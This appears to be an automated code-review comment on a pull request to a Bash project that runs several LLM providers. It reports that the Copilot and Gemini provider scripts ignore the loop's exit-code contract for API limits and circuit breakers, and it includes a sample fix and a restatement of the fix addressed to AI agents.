rg -n -B 3 -A 3 'EXIT_SIGNAL\|response_analysis\|project_complete' ralph_loop.sh

Repository: frankbria/ralph-claude-code
Length of output: 133
🏁 Script executed:
# Read the full provider_execute implementations
echo "=== claude.sh full functions ==="
sed -n '108,150p' lib/providers/claude.sh
echo ""
echo "=== copilot.sh full functions ==="
sed -n '19,80p' lib/providers/copilot.sh
echo ""
echo "=== gemini.sh full functions ==="
sed -n '19,80p' lib/providers/gemini.sh

Repository: frankbria/ralph-claude-code
Length of output: 5531
Provider implementations don't honor the exit code contract, breaking API limit and circuit breaker handling for Copilot and Gemini.
The exit code contract (0=success, 2=API limit, 3=circuit breaker) is only implemented in claude.sh. Both copilot.sh and gemini.sh return only 0 or 1, meaning ralph_loop.sh's API-limit path (line 688) and circuit-breaker path (line 681) will never trigger for these providers. This is a functional gap, not a documentation issue — all providers must return the same exit codes to match the loop's expectations.
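A minimal sketch of what honoring the contract could look like in a provider; the detection patterns and file names here are assumptions, not the actual gemini.sh or copilot.sh logic:

provider_execute() {
    local output_file="provider_output.log"

    # ... run the backend here and capture its output into "$output_file" ...

    if grep -qiE 'rate limit|quota exceeded|429' "$output_file" 2>/dev/null; then
        return 2    # API limit reached; ralph_loop.sh takes its back-off branch
    fi
    if [[ -f ".circuit_breaker_open" ]]; then
        return 3    # circuit breaker tripped; handled explicitly by the loop
    fi
    return 0        # normal completion
}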
🤖 Prompt for AI Agents
In `@ralph_loop.sh` around lines 672-674: The provider scripts (copilot.sh and
gemini.sh) do not follow the exit-code contract expected by
provider_execute/ralph_loop.sh (0=success, 2=API limit, 3=circuit breaker)
causing API-limit and circuit-breaker branches to never run; update the provider
implementations so their entrypoint (the function or script invoked by
provider_execute) returns 0 on success, 2 when an upstream API-rate/limit error
is detected, and 3 when a circuit-breaker/blacklist condition is hit (mirror how
claude.sh does it); ensure any internal helpers or wrapper functions used by
provider_execute propagate these numeric exit codes instead of collapsing to 0/1
so provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT" yields the
correct exec_result for ralph_loop.sh to handle.
- Validate prompt file existence in copilot.sh
- Implement exit code 2 for API limits in gemini.sh
- Validate loop_number as integer in log_session_transition
This change introduces a provider-based architecture to support multiple LLM backends (Claude, Gemini, Copilot). It also adds a session manager and tool executor to centralize execution logic and improve session continuity.
Summary by CodeRabbit
New Features
Documentation
Tests